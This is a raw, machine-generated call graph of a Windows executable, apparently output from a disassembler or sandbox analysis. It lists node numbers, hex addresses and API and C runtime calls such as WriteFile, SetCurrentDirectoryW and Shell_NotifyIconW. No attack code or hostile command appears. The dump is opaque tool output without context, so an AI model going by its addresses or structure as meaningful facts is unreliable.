93802->93800 93803 ee4f3f LockResource 93802->93803 93803->93800 93805 e74526 93804->93805 93806 ee4fe0 93804->93806 93810 e93a8d 93805->93810 93808 e74534 93808->93682 93809->93676 93811 e93a99 _raise 93810->93811 93812 e93aa7 93811->93812 93813 e93acd 93811->93813 93823 e97c0e 47 API calls __getptd_noexit 93812->93823 93825 e94e1c 93813->93825 93816 e93aac 93824 e96e10 8 API calls _raise 93816->93824 93820 e93ae2 93832 e93b04 LeaveCriticalSection LeaveCriticalSection _fseek 93820->93832 93822 e93ab7 _raise 93822->93808 93823->93816 93824->93822 93826 e94e2c 93825->93826 93827 e94e4e EnterCriticalSection 93825->93827 93826->93827 93828 e94e34 93826->93828 93829 e93ad3 93827->93829 93830 e97cf4 __lock 47 API calls 93828->93830 93831 e939fe 81 API calls 4 library calls 93829->93831 93830->93829 93831->93820 93832->93822 93836 e93839 93833->93836 93835 e74510 93835->93695 93837 e93845 _raise 93836->93837 93838 e93888 93837->93838 93839 e9385b _memset 93837->93839 93840 e93880 _raise 93837->93840 93841 e94e1c __lock_file 48 API calls 93838->93841 93849 e97c0e 47 API calls __getptd_noexit 93839->93849 93840->93835 93842 e9388e 93841->93842 93851 e9365b 62 API calls 5 library calls 93842->93851 93845 e93875 93850 e96e10 8 API calls _raise 93845->93850 93846 e938a4 93852 e938c2 LeaveCriticalSection LeaveCriticalSection _fseek 93846->93852 93849->93845 93850->93840 93851->93846 93852->93840 93856 e9344a GetSystemTimeAsFileTime 93853->93856 93855 ebbdc3 93855->93697 93857 e93478 __aulldiv 93856->93857 93857->93855 93859 e93e71 _raise 93858->93859 93860 e93e7f 93859->93860 93861 e93e94 93859->93861 93872 e97c0e 47 API calls __getptd_noexit 93860->93872 93863 e94e1c __lock_file 48 API calls 93861->93863 93864 e93e9a 93863->93864 93874 e93b0c 55 API calls 6 library calls 93864->93874 93865 e93e84 93873 e96e10 8 API calls _raise 93865->93873 93868 e93ea5 93875 e93ec5 LeaveCriticalSection LeaveCriticalSection _fseek 93868->93875 93870 e93eb7 93871 e93e8f _raise 93870->93871 93871->93702 93872->93865 93873->93871 93874->93868 93875->93870 93877 ebc581 __tzset_nolock _wcscmp 93876->93877 93878 e744ed 64 API calls 93877->93878 93879 ebc417 93877->93879 93880 ebbf5a GetSystemTimeAsFileTime 93877->93880 93881 e74517 83 API calls 93877->93881 93878->93877 93879->93618 93879->93647 93880->93877 93881->93877 93882->93644 93884 e935f0 _raise 93883->93884 93885 e9361c 93884->93885 93886 e93604 93884->93886 93889 e94e1c __lock_file 48 API calls 93885->93889 93892 e93614 _raise 93885->93892 93912 e97c0e 47 API calls __getptd_noexit 93886->93912 93888 e93609 93913 e96e10 8 API calls _raise 93888->93913 93891 e9362e 93889->93891 93896 e93578 93891->93896 93892->93653 93897 e9359b 93896->93897 93898 e93587 93896->93898 93902 e93597 93897->93902 93915 e92c84 93897->93915 93955 e97c0e 47 API calls __getptd_noexit 93898->93955 93901 e9358c 93956 e96e10 8 API calls _raise 93901->93956 93914 e93653 LeaveCriticalSection LeaveCriticalSection _fseek 93902->93914 93908 e935b5 93932 e9e9d2 93908->93932 93910 e935bb 93910->93902 93911 e91c9d _free 47 API calls 93910->93911 93911->93902 93912->93888 93913->93892 93914->93892 93916 e92c97 93915->93916 93920 e92cbb 93915->93920 93917 e92933 __flush 47 API calls 93916->93917 93916->93920 93918 e92cb4 93917->93918 93957 e9af61 93918->93957 93921 e9eb36 93920->93921 93922 e935af 93921->93922 93923 e9eb43 93921->93923 93925 e92933 93922->93925 93923->93922 93924 e91c9d _free 47 API calls 93923->93924 93924->93922 93926 e9293d 93925->93926 93927 e92952 93925->93927 94063 e97c0e 47 API calls __getptd_noexit 93926->94063 93927->93908 93929 e92942 94064 e96e10 8 API calls _raise 93929->94064 93931 e9294d 93931->93908 93933 e9e9de _raise 93932->93933 93934 e9e9fe 93933->93934 93935 e9e9e6 93933->93935 93936 e9ea7b 93934->93936 93941 e9ea28 93934->93941 94080 e97bda 47 API calls __getptd_noexit 93935->94080 94084 e97bda 47 API calls __getptd_noexit 93936->94084 93939 e9e9eb 94081 e97c0e 47 API calls __getptd_noexit 93939->94081 93940 e9ea80 94085 e97c0e 47 API calls __getptd_noexit 93940->94085 93944 e9a8ed ___lock_fhandle 49 API calls 93941->93944 93947 e9ea2e 93944->93947 93945 e9e9f3 _raise 93945->93910 93946 e9ea88 94086 e96e10 8 API calls _raise 93946->94086 93949 e9ea4c 93947->93949 93950 e9ea41 93947->93950 94082 e97c0e 47 API calls __getptd_noexit 93949->94082 94065 e9ea9c 93950->94065 93953 e9ea47 94083 e9ea73 LeaveCriticalSection __unlock_fhandle 93953->94083 93955->93901 93956->93902 93958 e9af6d _raise 93957->93958 93959 e9af8d 93958->93959 93960 e9af75 93958->93960 93962 e9b022 93959->93962 93966 e9afbf 93959->93966 94055 e97bda 47 API calls __getptd_noexit 93960->94055 94060 e97bda 47 API calls __getptd_noexit 93962->94060 93963 e9af7a 94056 e97c0e 47 API calls __getptd_noexit 93963->94056 93965 e9b027 94061 e97c0e 47 API calls __getptd_noexit 93965->94061 93982 e9a8ed 93966->93982 93970 e9af82 _raise 93970->93920 93971 e9b02f 94062 e96e10 8 API calls _raise 93971->94062 93972 e9afc5 93974 e9afd8 93972->93974 93975 e9afeb 93972->93975 93991 e9b043 93974->93991 94057 e97c0e 47 API calls __getptd_noexit 93975->94057 93978 e9aff0 94058 e97bda 47 API calls __getptd_noexit 93978->94058 93979 e9afe4 94059 e9b01a LeaveCriticalSection __unlock_fhandle 93979->94059 93983 e9a8f9 _raise 93982->93983 93984 e9a946 EnterCriticalSection 93983->93984 93985 e97cf4 __lock 47 API calls 93983->93985 93986 e9a96c _raise 93984->93986 93987 e9a91d 93985->93987 93986->93972 93988 e9a928 InitializeCriticalSectionAndSpinCount 93987->93988 93989 e9a93a 93987->93989 93988->93989 93990 e9a970 ___lock_fhandle LeaveCriticalSection 93989->93990 93990->93984 93992 e9b050 __ftell_nolock 93991->93992 93993 e9b08d 93992->93993 93994 e9b0ac 93992->93994 94024 e9b082 93992->94024 93995 e97bda __dosmaperr 47 API calls 93993->93995 93998 e9b105 93994->93998 93999 e9b0e9 93994->93999 93997 e9b092 93995->93997 93996 e9a70c __woutput_l 6 API calls 94000 e9b86b 93996->94000 94001 e97c0e _raise 47 API calls 93997->94001 94002 e9b11c 93998->94002 94005 e9f82f __lseeki64_nolock 49 API calls 93998->94005 94003 e97bda __dosmaperr 47 API calls 93999->94003 94000->93979 94004 e9b099 94001->94004 94006 ea3bf2 __stbuf 47 API calls 94002->94006 94007 e9b0ee 94003->94007 94008 e96e10 _raise 8 API calls 94004->94008 94005->94002 94009 e9b12a 94006->94009 94010 e97c0e _raise 47 API calls 94007->94010 94008->94024 94011 e9b44b 94009->94011 94017 e97a0d _wcstok 47 API calls 94009->94017 94012 e9b0f5 94010->94012 94013 e9b7b8 WriteFile 94011->94013 94014 e9b463 94011->94014 94015 e96e10 _raise 8 API calls 94012->94015 94016 e9b7e1 GetLastError 94013->94016 94026 e9b410 94013->94026 94018 e9b55a 94014->94018 94023 e9b479 94014->94023 94015->94024 94016->94026 94019 e9b150 GetConsoleMode 94017->94019 94029 e9b663 94018->94029 94032 e9b565 94018->94032 94019->94011 94021 e9b189 94019->94021 94020 e9b81b 94020->94024 94025 e97c0e _raise 47 API calls 94020->94025 94021->94011 94027 e9b199 GetConsoleCP 94021->94027 94022 e9b4e9 WriteFile 94022->94016 94028 e9b526 94022->94028 94023->94020 94023->94022 94024->93996 94030 e9b843 94025->94030 94026->94020 94026->94024 94031 e9b7f7 94026->94031 94027->94026 94049 e9b1c2 94027->94049 94028->94023 94028->94026 94040 e9b555 94028->94040 94029->94020 94033 e9b6d8 WideCharToMultiByte 94029->94033 94034 e97bda __dosmaperr 47 API calls 94030->94034 94035 e9b7fe 94031->94035 94036 e9b812 94031->94036 94032->94020 94037 e9b5de WriteFile 94032->94037 94033->94016 94047 e9b71f 94033->94047 94034->94024 94041 e97c0e _raise 47 API calls 94035->94041 94038 e97bed __dosmaperr 47 API calls 94036->94038 94037->94016 94039 e9b62d 94037->94039 94038->94024 94039->94026 94039->94032 94039->94040 94040->94026 94043 e9b803 94041->94043 94042 e9b727 WriteFile 94045 e9b77a GetLastError 94042->94045 94042->94047 94046 e97bda __dosmaperr 47 API calls 94043->94046 94044 e91688 __chsize_nolock 57 API calls 94044->94049 94045->94047 94046->94024 94047->94026 94047->94029 94047->94040 94047->94042 94048 ea40f7 59 API calls __chsize_nolock 94048->94049 94049->94026 94049->94044 94049->94048 94050 e9b28f WideCharToMultiByte 94049->94050 94051 e9b2f6 94049->94051 94050->94026 94052 e9b2ca WriteFile 94050->94052 94051->94016 94051->94026 94051->94049 94053 ea5884 WriteConsoleW CreateFileW __chsize_nolock 94051->94053 94054 e9b321 WriteFile 94051->94054 94052->94016 94052->94051 94053->94051 94054->94016 94054->94051 94055->93963 94056->93970 94057->93978 94058->93979 94059->93970 94060->93965 94061->93971 94062->93970 94063->93929 94064->93931 94087 e9aba4 94065->94087 94067 e9eb00 94100 e9ab1e 48 API calls 2 library calls 94067->94100 94069 e9eaaa 94069->94067 94071 e9aba4 __lseeki64_nolock 47 API calls 94069->94071 94079 e9eade 94069->94079 94070 e9aba4 __lseeki64_nolock 47 API calls 94072 e9eaea CloseHandle 94070->94072 94075 e9ead5 94071->94075 94072->94067 94077 e9eaf6 GetLastError 94072->94077 94073 e9eb2a 94073->93953 94074 e9eb08 94074->94073 94101 e97bed 47 API calls 2 library calls 94074->94101 94076 e9aba4 __lseeki64_nolock 47 API calls 94075->94076 94076->94079 94077->94067 94079->94067 94079->94070 94080->93939 94081->93945 94082->93953 94083->93945 94084->93940 94085->93946 94086->93945 94088 e9abaf 94087->94088 94089 e9abc4 94087->94089 94090 e97bda __dosmaperr 47 API calls 94088->94090 94092 e97bda __dosmaperr 47 API calls 94089->94092 94094 e9abe9 94089->94094 94091 e9abb4 94090->94091 94093 e97c0e _raise 47 API calls 94091->94093 94095 e9abf3 94092->94095 94096 e9abbc 94093->94096 94094->94069 94097 e97c0e _raise 47 API calls 94095->94097 94096->94069 94098 e9abfb 94097->94098 94099 e96e10 _raise 8 API calls 94098->94099 94099->94096 94100->94074 94101->94073 94102->93557 94103->93568 94104->93568 94105->93562 94106->93581 94107->93583 94108->93580 94110 e9f8a0 __ftell_nolock 94109->94110 94111 e740b4 GetLongPathNameW 94110->94111 94112 e76a63 48 API calls 94111->94112 94113 e740dc 94112->94113 94114 e749a0 94113->94114 94115 e7d7f7 48 API calls 94114->94115 94116 e749b2 94115->94116 94117 e7660f 49 API calls 94116->94117 94118 e749bd 94117->94118 94119 ee2e35 94118->94119 94120 e749c8 94118->94120 94125 ee2e4f 94119->94125 94167 e8d35e 60 API calls 94119->94167 94121 e764cf 48 API calls 94120->94121 94123 e749d4 94121->94123 94161 e728a6 94123->94161 94126 e749e7 Mailbox 94126->93413 94128 e741a9 136 API calls 94127->94128 94129 e7415e 94128->94129 94130 ee3489 94129->94130 94131 e741a9 136 API calls 94129->94131 94132 ebc396 122 API calls 94130->94132 94133 e74172 94131->94133 94134 ee349e 94132->94134 94133->94130 94135 e7417a 94133->94135 94136 ee34bf 94134->94136 94137 ee34a2 94134->94137 94139 e74186 94135->94139 94140 ee34aa 94135->94140 94138 e8f4ea 48 API calls 94136->94138 94141 e74252 84 API calls 94137->94141 94160 ee3504 Mailbox 94138->94160 94168 e7c833 94139->94168 94256 eb6b49 87 API calls _wprintf 94140->94256 94141->94140 94144 ee34b8 94144->94136 94146 ee36b4 94147 e91c9d _free 47 API calls 94146->94147 94148 ee36bc 94147->94148 94149 e74252 84 API calls 94148->94149 94150 ee36c5 94149->94150 94154 e91c9d _free 47 API calls 94150->94154 94155 e74252 84 API calls 94150->94155 94262 eb25b5 86 API calls 4 library calls 94150->94262 94154->94150 94155->94150 94157 e7ce19 48 API calls 94157->94160 94160->94146 94160->94150 94160->94157 94257 eb2551 48 API calls ___crtGetEnvironmentStringsW 94160->94257 94258 eb2472 60 API calls 2 library calls 94160->94258 94259 eb9c12 48 API calls 94160->94259 94260 e7ba85 48 API calls ___crtGetEnvironmentStringsW 94160->94260 94261 e74dd9 48 API calls 94160->94261 94162 e728b8 94161->94162 94166 e728d7 ___crtGetEnvironmentStringsW 94161->94166 94164 e8f4ea 48 API calls 94162->94164 94163 e8f4ea 48 API calls 94165 e728ee 94163->94165 94164->94166 94165->94126 94166->94163 94167->94119 94169 e7c843 __ftell_nolock 94168->94169 94170 e7c860 94169->94170 94171 ee3095 94169->94171 94268 e748ba 49 API calls 94170->94268 94287 eb25b5 86 API calls 4 library calls 94171->94287 94174 ee30a8 94288 eb25b5 86 API calls 4 library calls 94174->94288 94175 e7c882 94269 e74550 56 API calls 94175->94269 94177 e7c897 94177->94174 94179 e7c89f 94177->94179 94181 e7d7f7 48 API calls 94179->94181 94180 ee30c4 94183 e7c90c 94180->94183 94182 e7c8ab 94181->94182 94270 e8e968 49 API calls __ftell_nolock 94182->94270 94185 ee30d7 94183->94185 94186 e7c91a 94183->94186 94189 e74907 CloseHandle 94185->94189 94273 e91dfc 94186->94273 94187 e7c8b7 94190 e7d7f7 48 API calls 94187->94190 94191 ee30e3 94189->94191 94192 e7c8c3 94190->94192 94193 e741a9 136 API calls 94191->94193 94194 e7660f 49 API calls 94192->94194 94195 ee310d 94193->94195 94196 e7c8d1 94194->94196 94199 ee3136 94195->94199 94203 ebc396 122 API calls 94195->94203 94271 e8eb66 SetFilePointerEx ReadFile 94196->94271 94198 e7c943 _wcscat _wcscpy 94202 e7c96d SetCurrentDirectoryW 94198->94202 94289 eb25b5 86 API calls 4 library calls 94199->94289 94200 e7c8fd 94272 e746ce SetFilePointerEx SetFilePointerEx 94200->94272 94206 e8f4ea 48 API calls 94202->94206 94207 ee3129 94203->94207 94205 ee314d 94215 e7cad1 Mailbox 94205->94215 94208 e7c988 94206->94208 94209 ee3152 94207->94209 94210 ee3131 94207->94210 94213 e747b7 48 API calls 94208->94213 94212 e74252 84 API calls 94209->94212 94211 e74252 84 API calls 94210->94211 94211->94199 94214 ee3157 94212->94214 94228 e7c993 Mailbox __NMSG_WRITE 94213->94228 94216 e8f4ea 48 API calls 94214->94216 94263 e748dd 94215->94263 94223 ee3194 94216->94223 94217 e7ca9d 94283 e74907 94217->94283 94221 e73d98 94221->93287 94221->93310 94290 e7ba85 48 API calls ___crtGetEnvironmentStringsW 94223->94290 94227 ee33ce 94296 eb9b72 48 API calls 94227->94296 94228->94217 94236 ee345f 94228->94236 94239 e7ce19 48 API calls 94228->94239 94242 ee3467 94228->94242 94276 e7b337 56 API calls _wcscpy 94228->94276 94277 e8c258 GetStringTypeW 94228->94277 94278 e7cb93 59 API calls __wcsnicmp 94228->94278 94279 e7cb5a GetStringTypeW __NMSG_WRITE 94228->94279 94280 e916d0 GetStringTypeW __towlower_l 94228->94280 94281 e7cc24 162 API calls 3 library calls 94228->94281 94282 e8c682 48 API calls 94228->94282 94232 ee3480 94232->94217 94233 ee33f0 94297 ed29e8 48 API calls ___crtGetEnvironmentStringsW 94233->94297 94235 ee33fd 94237 e91c9d _free 47 API calls 94235->94237 94299 eb240b 48 API calls 3 library calls 94236->94299 94237->94215 94239->94228 94300 eb25b5 86 API calls 4 library calls 94242->94300 94247 e7ce19 48 API calls 94252 ee31dd Mailbox 94247->94252 94250 ee3420 94298 eb25b5 86 API calls 4 library calls 94250->94298 94252->94227 94252->94247 94252->94250 94291 eb2551 48 API calls ___crtGetEnvironmentStringsW 94252->94291 94292 eb2472 60 API calls 2 library calls 94252->94292 94293 eb9c12 48 API calls 94252->94293 94294 e7ba85 48 API calls ___crtGetEnvironmentStringsW 94252->94294 94295 e8c682 48 API calls 94252->94295 94253 ee3439 94254 e91c9d _free 47 API calls 94253->94254 94255 ee344c 94254->94255 94255->94215 94256->94144 94257->94160 94258->94160 94259->94160 94260->94160 94261->94160 94262->94150 94264 e74907 CloseHandle 94263->94264 94265 e748e5 Mailbox 94264->94265 94266 e74907 CloseHandle 94265->94266 94267 e748fc 94266->94267 94267->94221 94268->94175 94269->94177 94270->94187 94271->94200 94272->94183 94301 e91e46 94273->94301 94276->94228 94277->94228 94278->94228 94279->94228 94280->94228 94281->94228 94282->94228 94284 e74911 SetCurrentDirectoryW 94283->94284 94285 e74920 94283->94285 94284->94215 94285->94284 94286 e74925 CloseHandle 94285->94286 94286->94284 94287->94174 94288->94180 94289->94205 94290->94252 94291->94252 94292->94252 94293->94252 94294->94252 94295->94252 94296->94233 94297->94235 94298->94253 94299->94242 94300->94232 94302 e91e61 94301->94302 94305 e91e55 94301->94305 94325 e97c0e 47 API calls __getptd_noexit 94302->94325 94304 e92019 94310 e91e41 94304->94310 94326 e96e10 8 API calls _raise 94304->94326 94305->94302 94316 e91ed4 94305->94316 94320 e99d6b 47 API calls _raise 94305->94320 94308 e91fa0 94308->94302 94308->94310 94311 e91fb0 94308->94311 94309 e91f5f 94309->94302 94312 e91f7b 94309->94312 94322 e99d6b 47 API calls _raise 94309->94322 94310->94198 94324 e99d6b 47 API calls _raise 94311->94324 94312->94302 94312->94310 94315 e91f91 94312->94315 94323 e99d6b 47 API calls _raise 94315->94323 94316->94302 94319 e91f41 94316->94319 94321 e99d6b 47 API calls _raise 94316->94321 94319->94308 94319->94309 94320->94316 94321->94319 94322->94312 94323->94310 94324->94310 94325->94304 94326->94310 94328 e74d94 94327->94328 94329 e74c8b 94327->94329 94328->93419 94329->94328 94330 e8f4ea 48 API calls 94329->94330 94331 e74cb2 94330->94331 94332 e8f4ea 48 API calls 94331->94332 94337 e74d22 94332->94337 94337->94328 94340 e7b470 94337->94340 94368 e74dd9 48 API calls 94337->94368 94369 eb9af1 48 API calls 94337->94369 94370 e7ba85 48 API calls ___crtGetEnvironmentStringsW 94337->94370 94338->93422 94339->93424 94371 e76b0f 94340->94371 94342 e7b69b 94378 e7ba85 48 API calls ___crtGetEnvironmentStringsW 94342->94378 94344 e7b6b5 Mailbox 94344->94337 94347 ee397b 94382 eb26bc 88 API calls 4 library calls 94347->94382 94348 e7bcce 48 API calls 94360 e7b495 94348->94360 94349 e7ba85 48 API calls 94349->94360 94352 e7b9e4 94384 eb26bc 88 API calls 4 library calls 94352->94384 94353 ee3973 94353->94344 94356 ee3989 94383 e7ba85 48 API calls ___crtGetEnvironmentStringsW 94356->94383 94358 ee3909 94361 e76b4a 48 API calls 94358->94361 94359 e7bb85 48 API calls 94359->94360 94360->94342 94360->94347 94360->94348 94360->94349 94360->94352 94360->94358 94360->94359 94364 e7bdfa 48 API calls 94360->94364 94367 ee3939 ___crtGetEnvironmentStringsW 94360->94367 94376 e7c413 59 API calls 94360->94376 94377 e7bc74 48 API calls 94360->94377 94379 e7c6a5 49 API calls 94360->94379 94380 e7c799 48 API calls ___crtGetEnvironmentStringsW 94360->94380 94362 ee3914 94361->94362 94366 e8f4ea 48 API calls 94362->94366 94365 e7b66c CharUpperBuffW 94364->94365 94365->94360 94366->94367 94381 eb26bc 88 API calls 4 library calls 94367->94381 94368->94337 94369->94337 94370->94337 94372 e8f4ea 48 API calls 94371->94372 94373 e76b34 94372->94373 94374 e76b4a 48 API calls 94373->94374 94375 e76b43 94374->94375 94375->94360 94376->94360 94377->94360 94378->94344 94379->94360 94380->94360 94381->94353 94382->94356 94383->94353 94384->94353 94386 ee418d EnumResourceNamesW 94385->94386 94387 e7403c LoadImageW 94385->94387 94388 e73ee1 RegisterClassExW 94386->94388 94387->94388 94389 e73f53 7 API calls 94388->94389 94389->93438 94391 e74c44 94390->94391 94392 ee3c33 94390->94392 94391->93444 94416 eb5819 61 API calls _W_store_winword 94391->94416 94392->94391 94393 ee3c3c DestroyIcon 94392->94393 94393->94391 94395 e751cb 94394->94395 94415 e752a2 Mailbox 94394->94415 94396 e76b0f 48 API calls 94395->94396 94397 e751d9 94396->94397 94398 e751e6 94397->94398 94399 ee3ca1 LoadStringW 94397->94399 94400 e76a63 48 API calls 94398->94400 94402 ee3cbb 94399->94402 94401 e751fb 94400->94401 94401->94402 94403 e7520c 94401->94403 94404 e7510d 48 API calls 94402->94404 94405 e752a7 94403->94405 94406 e75216 94403->94406 94409 ee3cc5 94404->94409 94407 e76eed 48 API calls 94405->94407 94408 e7510d 48 API calls 94406->94408 94412 e75220 _memset _wcscpy 94407->94412 94408->94412 94410 e7518c 48 API calls 94409->94410 94409->94412 94411 ee3ce7 94410->94411 94414 e7518c 48 API calls 94411->94414 94413 e75288 Shell_NotifyIconW 94412->94413 94413->94415 94414->94412 94415->93449 94416->93444 94418 e7f130 94417->94418 94421 e7fe30 335 API calls 94418->94421 94426 e7f199 94418->94426 94419 e7f3dd 94422 ee87c8 94419->94422 94432 e7f3f2 94419->94432 94467 e7f431 Mailbox 94419->94467 94420 e7f595 94428 e7d7f7 48 API calls 94420->94428 94420->94467 94423 ee8728 94421->94423 94590 ebcc5c 86 API calls 4 library calls 94422->94590 94423->94426 94587 ebcc5c 86 API calls 4 library calls 94423->94587 94424 e7fe30 335 API calls 94424->94467 94426->94419 94426->94420 94429 e7d7f7 48 API calls 94426->94429 94461 e7f229 94426->94461 94430 ee87a3 94428->94430 94434 ee8772 94429->94434 94589 e90f0a 52 API calls __cinit 94430->94589 94458 e7f418 94432->94458 94591 eb9af1 48 API calls 94432->94591 94433 ee8b1b 94448 ee8bcf 94433->94448 94449 ee8b2c 94433->94449 94588 e90f0a 52 API calls __cinit 94434->94588 94436 e7f770 94442 ee8a45 94436->94442 94459 e7f77a 94436->94459 94438 e7d6e9 55 API calls 94438->94467 94439 ee8c53 94605 ebcc5c 86 API calls 4 library calls 94439->94605 94440 ee8810 94592 eceef8 335 API calls 94440->94592 94441 e7fe30 335 API calls 94462 e7f6aa 94441->94462 94597 e8c1af 48 API calls 94442->94597 94443 ebcc5c 86 API calls 94443->94467 94444 ee8b7e 94600 ece40a 335 API calls Mailbox 94444->94600 94602 ebcc5c 86 API calls 4 library calls 94448->94602 94599 ecf5ee 335 API calls 94449->94599 94450 ee8beb 94603 ecbdbd 335 API calls Mailbox 94450->94603 94454 e81b90 48 API calls 94454->94467 94455 e81b90 48 API calls 94455->94467 94458->94433 94458->94462 94458->94467 94459->94454 94460 ee8c00 94481 e7f537 Mailbox 94460->94481 94604 ebcc5c 86 API calls 4 library calls 94460->94604 94461->94419 94461->94420 94461->94458 94461->94467 94462->94436 94462->94441 94464 e7fce0 94462->94464 94462->94467 94462->94481 94463 ee8823 94463->94458 94466 ee884b 94463->94466 94464->94481 94601 ebcc5c 86 API calls 4 library calls 94464->94601 94593 ecccdc 48 API calls 94466->94593 94467->94424 94467->94438 94467->94439 94467->94443 94467->94444 94467->94450 94467->94455 94467->94464 94467->94481 94586 e7dd47 48 API calls ___crtGetEnvironmentStringsW 94467->94586 94598 ea97ed InterlockedDecrement 94467->94598 94606 e8c1af 48 API calls 94467->94606 94471 ee8857 94473 ee8865 94471->94473 94474 ee88aa 94471->94474 94594 eb9b72 48 API calls 94473->94594 94477 ee88a0 Mailbox 94474->94477 94595 eba69d 48 API calls 94474->94595 94475 e7fe30 335 API calls 94475->94481 94477->94475 94479 ee88e7 94596 e7bc74 48 API calls 94479->94596 94481->93510 94483 e8479f 94482->94483 94484 e84637 94482->94484 94485 e7ce19 48 API calls 94483->94485 94486 ee6e05 94484->94486 94487 e84643 94484->94487 94493 e846e4 Mailbox 94485->94493 94675 ece822 335 API calls Mailbox 94486->94675 94607 e84300 94487->94607 94490 ee6e11 94494 e84739 Mailbox 94490->94494 94676 ebcc5c 86 API calls 4 library calls 94490->94676 94491 e84659 94491->94490 94491->94493 94491->94494 94495 e74252 84 API calls 94493->94495 94622 ec6ff0 94493->94622 94631 ebfa0c 94493->94631 94672 eb6524 94493->94672 94494->93510 94495->94494 94786 e7bd30 94499->94786 94501 e83267 94503 e832f8 94501->94503 94504 ee907a 94501->94504 94563 e83628 94501->94563 94798 e8c36b 86 API calls 94503->94798 94804 ebcc5c 86 API calls 4 library calls 94504->94804 94508 e83313 94559 e834eb Mailbox ___crtGetEnvironmentStringsW 94508->94559 94508->94563 94564 ee94df 94508->94564 94791 e72b7a 94508->94791 94509 ee91fa 94809 ebcc5c 86 API calls 4 library calls 94509->94809 94510 e8c3c3 48 API calls 94510->94559 94514 ee93c5 94517 e7fe30 335 API calls 94514->94517 94515 ee926d 94813 ebcc5c 86 API calls 4 library calls 94515->94813 94516 ee909a 94516->94509 94518 e7d645 53 API calls 94516->94518 94520 ee9407 94517->94520 94521 ee910c 94518->94521 94530 e7d6e9 55 API calls 94520->94530 94520->94563 94524 ee9114 94521->94524 94525 ee9220 94521->94525 94522 e833ce 94527 ee945e 94522->94527 94528 e83465 94522->94528 94522->94559 94537 ee9128 94524->94537 94545 ee9152 94524->94545 94810 e71caa 49 API calls 94525->94810 94819 ebc942 50 API calls 94527->94819 94533 e8f4ea 48 API calls 94528->94533 94534 ee9438 94530->94534 94548 e8346c 94533->94548 94818 ebcc5c 86 API calls 4 library calls 94534->94818 94535 ee923d 94539 ee925e 94535->94539 94540 ee9252 94535->94540 94536 e7fe30 335 API calls 94536->94559 94805 ebcc5c 86 API calls 4 library calls 94537->94805 94812 ebcc5c 86 API calls 4 library calls 94539->94812 94811 ebcc5c 86 API calls 4 library calls 94540->94811 94547 ee9177 94545->94547 94550 ee9195 94545->94550 94806 ecf320 335 API calls 94547->94806 94553 e7e8d0 335 API calls 94548->94553 94555 e8351f 94548->94555 94551 ee918b 94550->94551 94807 ecf5ee 335 API calls 94550->94807 94551->94563 94808 e8c2d6 48 API calls ___crtGetEnvironmentStringsW 94551->94808 94553->94559 94554 e8f4ea 48 API calls 94554->94559 94557 e76eed 48 API calls 94555->94557 94558 e83540 94555->94558 94557->94558 94558->94563 94565 ee94b0 94558->94565 94567 e83585 94558->94567 94559->94510 94559->94514 94559->94515 94559->94516 94559->94534 94559->94536 94559->94554 94559->94555 94560 ee9394 94559->94560 94559->94563 94800 e7d9a0 53 API calls __cinit 94559->94800 94801 e7d8c0 53 API calls 94559->94801 94802 e8c2d6 48 API calls ___crtGetEnvironmentStringsW 94559->94802 94814 eccda2 82 API calls Mailbox 94559->94814 94815 eb80e3 53 API calls 94559->94815 94816 e7d764 55 API calls 94559->94816 94817 e7dcae 50 API calls Mailbox 94559->94817 94562 e8f4ea 48 API calls 94560->94562 94562->94514 94570 e83635 Mailbox 94563->94570 94803 ebcc5c 86 API calls 4 library calls 94563->94803 94564->94563 94821 ebcc5c 86 API calls 4 library calls 94564->94821 94820 e7dcae 50 API calls Mailbox 94565->94820 94567->94563 94567->94564 94568 e83615 94567->94568 94799 e7dcae 50 API calls Mailbox 94568->94799 94570->93510 94571->93510 94572->93510 94573->93510 94574->93510 94575->93454 94576->93458 94577->93463 94578->93510 94579->93510 94580->93506 94581->93506 94582->93506 94583->93506 94584->93506 94585->93506 94586->94467 94587->94426 94588->94461 94589->94467 94590->94481 94591->94440 94592->94463 94593->94471 94594->94477 94595->94479 94596->94477 94597->94467 94598->94467 94599->94467 94600->94464 94601->94481 94602->94481 94603->94460 94604->94481 94605->94481 94606->94467 94608 e8432c 94607->94608 94609 ee6e60 94607->94609 94611 ee6e71 94608->94611 94619 e84366 ___crtGetEnvironmentStringsW 94608->94619 94678 ebcc5c 86 API calls 4 library calls 94609->94678 94679 ebcc5c 86 API calls 4 library calls 94611->94679 94613 e84435 94618 e84445 94613->94618 94677 eccda2 82 API calls Mailbox 94613->94677 94615 e8f4ea 48 API calls 94615->94619 94616 e844b1 94616->94491 94617 e7fe30 335 API calls 94617->94619 94618->94491 94619->94613 94619->94615 94619->94617 94619->94618 94620 ee6ebd 94619->94620 94680 ebcc5c 86 API calls 4 library calls 94620->94680 94623 e7936c 81 API calls 94622->94623 94624 ec702a 94623->94624 94625 e7b470 91 API calls 94624->94625 94627 ec703a 94625->94627 94626 ec705f 94630 ec7063 94626->94630 94681 e7cdb9 48 API calls 94626->94681 94627->94626 94628 e7fe30 335 API calls 94627->94628 94628->94626 94630->94494 94632 ebfa1c __ftell_nolock 94631->94632 94633 ebfa44 94632->94633 94743 e7d286 48 API calls 94632->94743 94635 e7936c 81 API calls 94633->94635 94636 ebfa5e 94635->94636 94637 ebfb68 94636->94637 94638 ebfa80 94636->94638 94648 ebfb92 94636->94648 94639 e741a9 136 API calls 94637->94639 94640 e7936c 81 API calls 94638->94640 94641 ebfb79 94639->94641 94646 ebfa8c _wcscpy _wcschr 94640->94646 94642 ebfb8e 94641->94642 94644 e741a9 136 API calls 94641->94644 94643 e7936c 81 API calls 94642->94643 94642->94648 94645 ebfbc7 94643->94645 94644->94642 94647 e91dfc __wsplitpath 47 API calls 94645->94647 94651 ebfab0 _wcscat _wcscpy 94646->94651 94656 ebfade _wcscat 94646->94656 94652 ebfbeb _wcscat _wcscpy 94647->94652 94648->94494 94649 e7936c 81 API calls 94650 ebfafc _wcscpy 94649->94650 94744 eb72cb GetFileAttributesW 94650->94744 94653 e7936c 81 API calls 94651->94653 94660 e7936c 81 API calls 94652->94660 94653->94656 94655 e7936c 81 API calls 94658 ebfb48 94655->94658 94656->94649 94657 ebfb1c __NMSG_WRITE 94657->94648 94657->94655 94745 eb60dd 77 API calls 4 library calls 94658->94745 94662 ebfc82 94660->94662 94661 ebfb5c 94661->94648 94682 eb690b 94662->94682 94664 ebfca2 94665 eb6524 3 API calls 94664->94665 94666 ebfcb1 94665->94666 94667 e7936c 81 API calls 94666->94667 94670 ebfce2 94666->94670 94668 ebfccb 94667->94668 94688 ebbfa4 94668->94688 94671 e74252 84 API calls 94670->94671 94671->94648 94782 eb6ca9 GetFileAttributesW 94672->94782 94675->94490 94676->94494 94677->94616 